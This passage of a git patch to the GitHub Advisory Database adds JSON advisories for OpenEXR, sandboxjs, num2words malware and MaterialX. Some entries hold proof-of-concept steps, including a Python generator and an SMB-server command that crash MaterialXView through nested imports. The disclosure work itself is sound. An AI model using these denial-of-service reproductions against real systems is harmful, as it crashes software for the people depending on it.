}\n```\n\nTherefore, in those cases, the sample buffer would not be allocated, resulting in a potential write operation on a NULL pointer.\n\n### PoC\n\nNOTE: please download the `runfill_crash.exr` file from the following link:\n \nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-48073\n\n1. Compile the `exrcheck` binary in a macOS or GNU/Linux machine with ASAN.\n2. Open the `runfill_crash.exr` file with the following command:\n\n```\nexrcheck -m runfill_crash.exr\n```\n\n3. Notice that `exrcheck` crashes with ASAN stack-trace.\n\n### Impact\nAn attacker may cause a denial of service by crashing the application.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "OpenEXR" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.2" + }, + { + "fixed": "3.3.3" + } + ] + } + ], + "versions": [ + "3.3.2" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-qhpm-86v7-phmm" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/openexr" + }, + { + "type": "WEB", + "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-48073" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:21:35Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json b/advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json new file mode 100644 index 0000000000000..52e76b608c687 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x22w-82jp-8rvf", + "modified": "2025-07-31T19:23:18Z", + "published": "2025-07-31T19:23:18Z", + "aliases": [ + "CVE-2025-48074" + ], + "summary": "OpenEXR Out-Of-Memory via Unbounded File Header Values", + "details": "### Summary\nThe OpenEXR file format defines many information about the final image inside of the file header, such as the size of data/display window.\n\nThe application trusts the value of `dataWindow` size provided in the header of the input file, and performs computations based on this value.\n\nThis may result in unintended behaviors, such as excessively large number of iterations and/or huge memory allocations.\n\n\n### Details\nA concrete example of this issue is present in the function `readScanline()` in `ImfCheckFile.cpp` at line 235, that performs a for-loop using the `dataWindow min.y` and `max.y` coordinates that can be arbitrarily large.\n\n```cpp\nin.setFrameBuffer (i);\n\nint step = 1;\n\n//\n// try reading scanlines. Continue reading scanlines\n// even if an exception is encountered\n//\nfor (int y = dw.min.y; y <= dw.max.y; y += step) // <-- THIS LOOP IS EXCESSIVE BECAUSE OF DW.MAX\n{\n try\n {\n in.readPixels (y);\n }\n catch (...)\n {\n threw = true;\n\n //\n // in reduceTime mode, fail immediately - the file is corrupt\n //\n if (reduceTime) { return threw; }\n }\n}\n```\n\nAnother example occurs in the `EnvmapImage::resize` function that in turn calls `Array2D::resizeEraseUnsafe` passing the `dataWindow` X and Y coordinates and perform a huge allocation.\n\nOn some system, the allocator will simply return `std::bad_alloc` and crash. On other systems such as macOS, the allocator will happily continue with a \"small\" pre-allocation and allocate further memory whenever it is accessed.\nThis is the case with the `EnvmapImage::clear` function that is called right after and fills the image RGB values with zeros, allocating tens of Gigabytes.\n\n### PoC\n\nNOTE: please download the `oom_crash.exr` file via the following link:\n \nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-48074\n\n1. Compile the `exrcheck` binary in a macOS or GNU/Linux machine with ASAN.\n2. Open the `oom_crash.exr` file with the following command:\n\n```\nexrcheck oom_crash.exr\n```\n\n3. Notice that `exrenvmap`/`exrcheck` crashes with ASAN stack-trace.\n\n### Impact\nAn attacker could cause a denial of service by stalling the application or exhaust memory by stalling the application in a loop which contains a memory leakage.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "OpenEXR" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.2" + }, + { + "fixed": "3.3.3" + } + ] + } + ], + "versions": [ + "3.3.2" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-x22w-82jp-8rvf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/openexr" + }, + { + "type": "WEB", + "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-48074" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:23:18Z", + "nvd_published_at": null + } +} \ No newline at end of file From c17457fb973f09f94fbf2fc56ef5d2846acc2e83 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 19:30:08 +0000 Subject: [PATCH 284/323] Publish GHSA-9qm3-6qrr-c76m --- .../GHSA-9qm3-6qrr-c76m.json | 35 ++++++++++++++++--- 1 file changed, 30 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json (69%) diff --git a/advisories/unreviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json b/advisories/github-reviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json similarity index 69% rename from advisories/unreviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json rename to advisories/github-reviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json index e87af9e7ea022..4c515942578d6 100644 --- a/advisories/unreviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json +++ b/advisories/github-reviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json @@ -1,19 +1,40 @@ { "schema_version": "1.4.0", "id": "GHSA-9qm3-6qrr-c76m", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T19:28:27Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2025-34146" ], + "summary": "@nyariv/sandboxjs has Prototype Pollution vulnerability that may lead to RCE", "details": "A prototype pollution vulnerability exists in @nyariv/sandboxjs versions <= 0.8.23, allowing attackers to inject arbitrary properties into Object.prototype via crafted JavaScript code. This can result in a denial-of-service (DoS) condition or, under certain conditions, escape the sandboxed environment intended to restrict code execution. The vulnerability stems from insufficient prototype access checks in the sandbox’s executor logic, particularly in the handling of JavaScript function objects returned.", "severity": [ { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@nyariv/sandboxjs" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.8.24" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -27,6 +48,10 @@ "type": "WEB", "url": "https://gist.github.com/Hagrid29/9df27829a491080f923c4f6b8518d7e3" }, + { + "type": "PACKAGE", + "url": "https://github.com/nyariv/SandboxJS" + }, { "type": "WEB", "url": "https://www.npmjs.com/package/@nyariv/sandboxjs" @@ -41,8 +66,8 @@ "CWE-1321" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:28:27Z", "nvd_published_at": "2025-07-31T15:15:36Z" } } \ No newline at end of file From 84503eef123bb748d2fcb3e0a4fcd5f161d0f702 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 19:35:59 +0000 Subject: [PATCH 285/323] Publish GHSA-jxr6-qrxx-2ph2 --- .../GHSA-jxr6-qrxx-2ph2.json | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-jxr6-qrxx-2ph2/GHSA-jxr6-qrxx-2ph2.json diff --git a/advisories/github-reviewed/2025/07/GHSA-jxr6-qrxx-2ph2/GHSA-jxr6-qrxx-2ph2.json b/advisories/github-reviewed/2025/07/GHSA-jxr6-qrxx-2ph2/GHSA-jxr6-qrxx-2ph2.json new file mode 100644 index 0000000000000..aa284a7759582 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-jxr6-qrxx-2ph2/GHSA-jxr6-qrxx-2ph2.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxr6-qrxx-2ph2", + "modified": "2025-07-31T19:33:29Z", + "published": "2025-07-31T19:33:29Z", + "aliases": [], + "summary": "num2words subjected to phishing attack, two versions published containing malware", + "details": "The `num2words` project was compromised via a phishing attack and two new versions were uploaded to PyPI containing malicious code. The affected versions have been removed from PyPI, and users are advised to remove the affected versions from their environments.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "num2words" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.5.15" + }, + { + "last_affected": "0.5.16" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/num2words/PYSEC-2025-72.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/savoirfairelinux/num2words" + }, + { + "type": "WEB", + "url": "https://nitter.tiekoetter.com/SFLinux/status/1949906299308953827" + }, + { + "type": "WEB", + "url": "https://www.stepsecurity.io/blog/supply-chain-security-alert-num2words-pypi-package-shows-signs-of-compromise" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-506" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:33:29Z", + "nvd_published_at": null + } +} \ No newline at end of file From abe9853a2d29cbda77c4d615d4c6ae4cb068509a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 19:39:23 +0000 Subject: [PATCH 286/323] Publish Advisories GHSA-qc2h-74x3-4v3w GHSA-wx6g-fm6f-w822 --- .../GHSA-qc2h-74x3-4v3w.json | 64 +++++++++++++++++++ .../GHSA-wx6g-fm6f-w822.json | 64 +++++++++++++++++++ 2 files changed, 128 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json create mode 100644 advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json diff --git a/advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json b/advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json new file mode 100644 index 0000000000000..043222b5b5a19 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc2h-74x3-4v3w", + "modified": "2025-07-31T19:37:51Z", + "published": "2025-07-31T19:37:51Z", + "aliases": [ + "CVE-2025-53012" + ], + "summary": "MaterialX Lack of MTLX Import Depth Limit Leads to DoS (Denial-Of-Service) Via Stack Exhaustion", + "details": "### Summary\nNested imports of MaterialX files can lead to a crash via stack memory exhaustion, due to the lack of a limit on the \"import chain\" depth.\n\n### Details\nThe MaterialX [specification](https://github.com/AcademySoftwareFoundation/MaterialX/blob/main/documents/Specification/MaterialX.Specification.md#mtlx-file-format-definition) supports importing other files by using `XInclude` tags.\n\nWhen parsing file imports, recursion is used to process nested files in the form of a tree with the root node being the first MaterialX files parsed.\n\nHowever, there is no limit imposed to the depth of files that\ncan be parsed by the library, therefore, by building a sufficiently deep chain of MaterialX files one referencing the next, it is possible to crash the process using the MaterialX library via stack exhaustion.\n\n### PoC\nThis test is going to employ Windows UNC paths, in order to make the Proof Of Concept more realistic. In fact, by using windows network shares, an attacker would be able to exploit the vulnerability (in Windows) if they could control the content of a single `.mtlx` file being parsed.\n\nNote that for the sake of simplicity the PoC will use the MaterialXView application to easily reproduce the vulnerability, however it does not affect MaterialXView directly.\n\nIn order to reproduce this test, please follow the steps below:\n\n1. Compile or download the MaterialXView application in a Windows machine\n2. In a separate Linux machine in the same local network, install the `impacket` package (the documentation of the package suggests using `pipx`, as in `python3 -m pipx install impacket\n`). \n3. In the Linux machine, create a file named `template.mtlx` with the following content:\n```xml\n\n\n \n \n \n \n \n \n \n \n \n \n \n\n```\n4. In the same directory, create a file named `script.py` with the following content:\n```python\nimport argparse\nimport uuid\nimport os\nfrom pathlib import Path\n\nMAX_FILES_PER_DIR = 1024\nMAX_DIRECTORIES = 1024\n\ndef uuid_generator(count):\n for _ in range(count):\n yield str(uuid.uuid4())\n\ndef get_dir_and_file_count(total_files):\n num_dirs = (total_files + MAX_FILES_PER_DIR - 1) // MAX_FILES_PER_DIR\n if num_dirs > MAX_DIRECTORIES:\n raise ValueError(f\"Too many files requested. Maximum is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}\")\n return num_dirs\n\ndef create_materialx_chain(template_path, output_dir, ip_address, share_name, num_iterations):\n with open(template_path, 'r') as f:\n template_content = f.read()\n \n Path(output_dir).mkdir(parents=True, exist_ok=True)\n \n dir_count = get_dir_and_file_count(num_iterations)\n dir_uuids = [str(uuid.uuid4()) for _ in range(dir_count)]\n \n for dir_uuid in dir_uuids:\n Path(os.path.join(output_dir, dir_uuid)).mkdir(exist_ok=True)\n \n uuid_gen = uuid_generator(num_iterations)\n next_uuid = next(uuid_gen)\n first_file_path = None\n\n for i in range(num_iterations):\n current_uuid = next_uuid\n next_uuid = next(uuid_gen) if i < num_iterations - 1 else \"FINAL\"\n \n dir_index = i // MAX_FILES_PER_DIR\n dir_uuid = dir_uuids[dir_index]\n \n if next_uuid != \"FINAL\":\n next_dir_index = (i + 1) // MAX_FILES_PER_DIR\n next_dir_uuid = dir_uuids[next_dir_index]\n include_path = f\"{share_name}\\\\{next_dir_uuid}\\\\{next_uuid}\"\n else:\n include_path = next_uuid\n \n content = template_content.replace(\"{ip}\", ip_address)\n content = content.replace(\"{name}\", include_path)\n \n output_path = os.path.join(output_dir, dir_uuid, f\"{current_uuid}.mtlx\")\n with open(output_path, 'w') as f:\n f.write(content)\n\n if i == 0:\n first_file_path = f\"\\\\\\\\{ip_address}\\\\{share_name}\\\\{dir_uuid}\\\\{current_uuid}.mtlx\"\n print(f\"First file created at UNC path: {first_file_path}\")\n\ndef main():\n parser = argparse.ArgumentParser(description='Generate chain of MaterialX files')\n parser.add_argument('template', help='Path to template MaterialX file')\n parser.add_argument('output_dir', help='Output directory for generated files')\n parser.add_argument('ip_address', help='IP address to use in file paths')\n parser.add_argument('share_name', help='Share name to use in file paths')\n parser.add_argument('--iterations', type=int, default=10,\n help='Number of files to generate (default: 10)')\n \n args = parser.parse_args()\n \n if args.iterations > MAX_FILES_PER_DIR * MAX_DIRECTORIES:\n print(f\"Error: Maximum number of files is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}\")\n return\n \n create_materialx_chain(\n args.template,\n args.output_dir,\n args.ip_address,\n args.share_name,\n args.iterations\n )\n\nif __name__ == \"__main__\":\n main()\n```\n5. Run the python script with the following command line, replacing the `$IP` placeholder with the IP address of your interface (the command will take some time to execute): `python3 script.py --iterations 1048576 template.mtlx chain $IP chain`\n - This will print, in the console, a line documenting the UNC path of the first file of the chain. Copy that path in the clipboard.\n6. Spawn the SMB server by executing the following command line: `pipx run --spec impacket smbserver.py -smb2support chain chain/`\n7. In the Windows machine, create a MaterialX file with the following content, replacing the `$UNCPATH` placeholder with the content of the path printed at step 5:\n```\n\n\n \n \n \n \n \n \n \n \n \n \n \n\n```\n8. Load the MaterialX file in MaterialXView\n9. Notice that the viewer doesn't respond anymore. After some minutes, notice that the viewer crashes, demonstrating the Stack Exhaustion\n\nNote: by consulting the Windows `Event Viewer`, it is possible to examine the application crash, verifying that it is indeed crashing with a `STATUS_STACK_OVERFLOW (0xc00000fd)`.\n\n### Impact\n\nAn attacker exploiting this vulnerability would be able to intentionally stall and crash an application reading MaterialX files controlled by them.\n\nIn Windows, the attack complexity is lower, since the malicious MaterialX file can reference remote paths via the UNC notation. However, the attack would work in other systems as well, provided that the attacker can write an arbitrary amount of MaterialX files (implementing the chain) in the local file system.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "MaterialX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.39.2" + }, + { + "fixed": "1.39.3" + } + ] + } + ], + "versions": [ + "1.39.2" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-qc2h-74x3-4v3w" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/blob/main/documents/Specification/MaterialX.Specification.md#mtlx-file-format-definition" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:37:51Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json b/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json new file mode 100644 index 0000000000000..19e52cca5edf2 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx6g-fm6f-w822", + "modified": "2025-07-31T19:37:48Z", + "published": "2025-07-31T19:37:48Z", + "aliases": [ + "CVE-2025-53009" + ], + "summary": "MaterialX Stack Overflow via Lack of MTLX XML Parsing Recursion Limit ", + "details": "### Summary\n\nWhen parsing an MTLX file with multiple nested `nodegraph` implementations, the MaterialX XML parsing logic can potentially crash due to stack exhaustion.\n\n### Details\n\nBy specification, multiple kinds of elements in MTLX support nesting other elements, such as in the case of `nodegraph` elements. Parsing these subtrees is implemented via recursion, and since there is no max depth imposed on the XML document, this can lead to a stack overflow when the library parses an MTLX file with an excessively high number of nested elements.\n\n### PoC\n\nPlease download the `recursion_overflow.mtlx` file from the following link: \n\nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-53009\n\n`build/bin/MaterialXView --material recursion_overflow.mtlx`\n\n\n### Impact\nAn attacker could intentionally crash a target program that uses OpenEXR by sending a malicious MTLX file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "MaterialX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.39.2" + }, + { + "fixed": "1.39.3" + } + ] + } + ], + "versions": [ + "1.39.2" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-wx6g-fm6f-w822" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX" + }, + { + "type": "WEB", + "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-53009" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T19:37:48Z", + "nvd_published_at": null + } +} \ No newline at end of file From 41c89aad20a757a7e7c6d80d26b72011fcd72f07 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 21:33:13 +0000 Subject: [PATCH 287/323] Advisory Database Sync --- .../GHSA-q5q7-8x6x-hcg2.json | 6 ++- .../GHSA-9g4q-mq35-ffg3.json | 6 ++- .../GHSA-w2xg-49x3-6w59.json | 7 ++- .../GHSA-2x45-7fc3-mxwq.json | 44 +++++++++++++++++ .../GHSA-32gv-r223-hpr7.json | 15 ++++-- .../GHSA-5qv2-823h-cg9j.json | 40 ++++++++++++++++ .../GHSA-6fpv-q3vm-j4gh.json | 15 ++++-- .../GHSA-6vjc-2rp5-c2hr.json | 15 ++++-- .../GHSA-75pq-m89c-9h5r.json | 15 ++++-- .../GHSA-782f-gxj5-xvqc.json | 15 ++++-- .../GHSA-7hhp-cmgc-52fj.json | 36 ++++++++++++++ .../GHSA-7rf9-h4hc-6359.json | 48 +++++++++++++++++++ .../GHSA-8xpj-x7cg-qg43.json | 44 +++++++++++++++++ .../GHSA-c2ff-5p35-6q77.json | 15 ++++-- .../GHSA-cmjc-2g23-9m8c.json | 15 ++++-- .../GHSA-g74q-gh4w-3jmf.json | 15 ++++-- .../GHSA-gcm8-8cp3-3x4h.json | 15 ++++-- .../GHSA-hp45-3w87-63c3.json | 44 +++++++++++++++++ .../GHSA-hq48-r775-f9j2.json | 15 ++++-- .../GHSA-j3vg-9hrg-5754.json | 34 +++++++++++++ .../GHSA-j927-gjfr-7859.json | 15 ++++-- .../GHSA-pv6m-hmr7-w8g8.json | 36 ++++++++++++++ .../GHSA-q4xj-79jm-5gwm.json | 15 ++++-- .../GHSA-r8fm-999q-9fw9.json | 36 ++++++++++++++ .../GHSA-rgc6-fx99-2prh.json | 36 ++++++++++++++ .../GHSA-rq5x-mmcc-mgvx.json | 44 +++++++++++++++++ .../GHSA-v78w-vpxh-p52w.json | 15 ++++-- .../GHSA-wc34-p4fh-wr9q.json | 44 +++++++++++++++++ .../GHSA-wqcc-7crj-3p76.json | 15 ++++-- .../GHSA-wr2x-xq5x-p5vf.json | 15 ++++-- .../GHSA-x7rh-jcrp-8fwf.json | 44 +++++++++++++++++ .../GHSA-xpf8-484v-j9w6.json | 44 +++++++++++++++++ .../GHSA-xxcm-4v4p-f9rr.json | 36 ++++++++++++++ 33 files changed, 791 insertions(+), 63 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5qv2-823h-cg9j/GHSA-5qv2-823h-cg9j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7hhp-cmgc-52fj/GHSA-7hhp-cmgc-52fj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7rf9-h4hc-6359/GHSA-7rf9-h4hc-6359.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8xpj-x7cg-qg43/GHSA-8xpj-x7cg-qg43.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hp45-3w87-63c3/GHSA-hp45-3w87-63c3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j3vg-9hrg-5754/GHSA-j3vg-9hrg-5754.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pv6m-hmr7-w8g8/GHSA-pv6m-hmr7-w8g8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r8fm-999q-9fw9/GHSA-r8fm-999q-9fw9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rgc6-fx99-2prh/GHSA-rgc6-fx99-2prh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rq5x-mmcc-mgvx/GHSA-rq5x-mmcc-mgvx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wc34-p4fh-wr9q/GHSA-wc34-p4fh-wr9q.json create mode 100644 advisories/unreviewed/2025/07/GHSA-x7rh-jcrp-8fwf/GHSA-x7rh-jcrp-8fwf.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xpf8-484v-j9w6/GHSA-xpf8-484v-j9w6.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xxcm-4v4p-f9rr/GHSA-xxcm-4v4p-f9rr.json diff --git a/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json b/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json index d4a42c95bfa72..910e52654a7a0 100644 --- a/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json +++ b/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q5q7-8x6x-hcg2", - "modified": "2025-07-31T18:31:56Z", + "modified": "2025-07-31T21:31:32Z", "published": "2025-05-26T12:30:30Z", "aliases": [ "CVE-2025-4057" @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:12355" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:12473" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8147" diff --git a/advisories/unreviewed/2025/01/GHSA-9g4q-mq35-ffg3/GHSA-9g4q-mq35-ffg3.json b/advisories/unreviewed/2025/01/GHSA-9g4q-mq35-ffg3/GHSA-9g4q-mq35-ffg3.json index 62c3d25403c68..34d612b1e479e 100644 --- a/advisories/unreviewed/2025/01/GHSA-9g4q-mq35-ffg3/GHSA-9g4q-mq35-ffg3.json +++ b/advisories/unreviewed/2025/01/GHSA-9g4q-mq35-ffg3/GHSA-9g4q-mq35-ffg3.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9g4q-mq35-ffg3", - "modified": "2025-01-22T18:31:56Z", + "modified": "2025-07-31T21:31:32Z", "published": "2025-01-22T18:31:56Z", "aliases": [ "CVE-2025-0651" ], "details": "Improper Privilege Management vulnerability in Cloudflare WARP on Windows allows File Manipulation.\n\nUser with a low system privileges  can create a set of symlinks inside the C:\\ProgramData\\Cloudflare\\warp-diag-partials folder. After triggering the 'Reset all settings\" option the WARP service will delete the files that the symlink was pointing to. Given the WARP service operates with System privileges this might lead to deleting files owned by the System user.\nThis issue affects WARP: before 2024.12.492.0.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:U/V:X/RE:L/U:Green" diff --git a/advisories/unreviewed/2025/01/GHSA-w2xg-49x3-6w59/GHSA-w2xg-49x3-6w59.json b/advisories/unreviewed/2025/01/GHSA-w2xg-49x3-6w59/GHSA-w2xg-49x3-6w59.json index f655e8a5ce848..96441c1c8daec 100644 --- a/advisories/unreviewed/2025/01/GHSA-w2xg-49x3-6w59/GHSA-w2xg-49x3-6w59.json +++ b/advisories/unreviewed/2025/01/GHSA-w2xg-49x3-6w59/GHSA-w2xg-49x3-6w59.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w2xg-49x3-6w59", - "modified": "2025-02-24T12:31:59Z", + "modified": "2025-07-31T21:31:32Z", "published": "2025-01-30T21:31:22Z", "aliases": [ "CVE-2024-10026" ], "details": "A weak hashing algorithm and small sizes of seeds/secrets in Google's gVisor allowed for a remote attacker to calculate a local IP address and a per-boot identifier that could aid in tracking of a device in certain circumstances.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -38,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-326", "CWE-328" ], "severity": "MODERATE", diff --git 